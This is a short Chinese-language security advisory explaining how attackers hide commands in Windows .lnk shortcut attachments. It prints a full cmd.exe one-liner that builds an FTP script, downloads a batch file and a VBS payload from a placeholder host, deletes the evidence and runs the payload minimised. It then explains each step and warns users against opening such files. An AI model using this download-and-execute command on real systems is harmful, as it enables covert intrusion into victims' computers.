.lnk 檔案類型入侵手法說明
.lnk 的檔案類型為 Windows 捷徑 (Computer_shortcut),通常不會出現在郵件的附檔中,但有些駭客利用 .lnk 檔案能呼叫 CMD 指令的功能,將有害的 CMD 程式碼寫到 .lnk 檔的「目標」欄內,以郵件寄給入侵對象,並引誘其執行該檔案,以達成入侵受害者電腦目的。
入侵範例說明
- 在.lnk 檔的「目標」欄內編寫一段能上網下載惡意程式的 CMD 指令
- 在「執行」欄內選'最小化',讓使用者不容易發覺有程式執行。
完整 CMD 指令內容如下:
C:\WINDOWS\system32\cmd.exe /c echo open xxx.xxx.edu.tw > t.t& echo 123 >> t.t& echo 123 >> t.t& echo get down3.bat c:\down3.bat >> t.t& echo get vnet3.vbs %windir%\vnet3.vbs >> t.t& echo bye >> t.t& ftp -s:t.t& del t.t& start %windir%\vnet3.vbs&
上面這段指令1~6行會產生一個名稱為 t.t 檔案,其內容如下:
open xxx.xxx.edu.tw 123 123 get down3.bat c:\down3.bat get vnet3.vbs %windir%\vnet3.vbs bye
第7行執行 ftp 命令並使用 -s 參數將 t.t 檔案當成批次指令來執行。此時會由 xxx.xxx.edu.tw ftp 伺服器下載 down3.bat & vnet3.vbs 2個檔案(惡意程式)。
第8行刪除 t.t 檔案(銷毀證據)。
第9行執行經由上述 ftp 過程下載的 vnet3.vbs(Visual Basic Script)。
上述 CMD 程式碼本身都是正常的指令,所以防毒軟體偵測不到。另外既然可以下載惡意程式,當然也可以上傳,駭客不用下載惡意程式,就可以直接將您的資料傳出去。
因此,建議使用者不要開啟來路不明郵件中的 .lnk 附檔,以免電腦遭入侵。
